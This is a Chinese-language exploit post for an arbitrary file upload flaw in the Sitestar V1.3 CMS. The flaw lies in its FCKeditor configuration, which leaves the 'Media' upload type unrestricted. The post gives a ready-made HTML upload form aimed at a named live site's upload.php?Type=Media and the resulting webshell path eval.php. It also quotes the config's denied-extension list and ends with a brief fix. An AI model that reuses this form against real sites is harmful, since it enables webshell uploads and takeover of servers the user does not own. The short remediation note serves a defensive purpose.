建站之星sitestar V1.3 通杀0day

影响版本：sitestar V1.3
官方网站：http://www.sitestar.cn

漏洞类型：文件上传
漏洞描述：此漏洞存仍然存在于FCK上传，程序采用了FCKeditor Version 2 .0。除了xiaocao 童鞋发布的建立1.ASP文件夹漏洞，还存在上传php脚本漏洞。
 

关键字：保留吧，以免批量``

漏洞文件：/admin/fckeditor/upload/config.php

<?php //省略代码// Due to security issues with Apache modules, it is reccomended to leave the  // following setting enabled.  $Config['ForceSingleExtension'] = true ;   $Config['AllowedExtensions']['File']    = array() ;  $Config['DeniedExtensions']['File']     = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;   $Config['AllowedExtensions']['Image']   = array('jpg','gif','jpeg','png') ;  $Config['DeniedExtensions']['Image']    = array() ;   $Config['AllowedExtensions']['Flash']   = array('swf','fla') ;  $Config['DeniedExtensions']['Flash']    = array() ;   ?> 看代码，这是修改过的FCKeditor配置文件。未对'Media'进行限制，导致可以上传任意文件。

测试方法：

和Fckeditor 2.4.2 原理一样。

http://www.hackline.net/a/news/ldfb/web/2009/1013/1005_2.html

上传EXP：

 <form id="frmUpload" enctype="multipart/form-data" action="http://www.hackline.net/admin/fckeditor//upload//upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
 

上传shell地址：

http://域名/upload/media/eval.php

上图证明：

 
漏洞修复：同理

修改config文件，限制上传目录的脚本执行权限。

$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;  $Config['DeniedExtensions']['Media'] = array() ;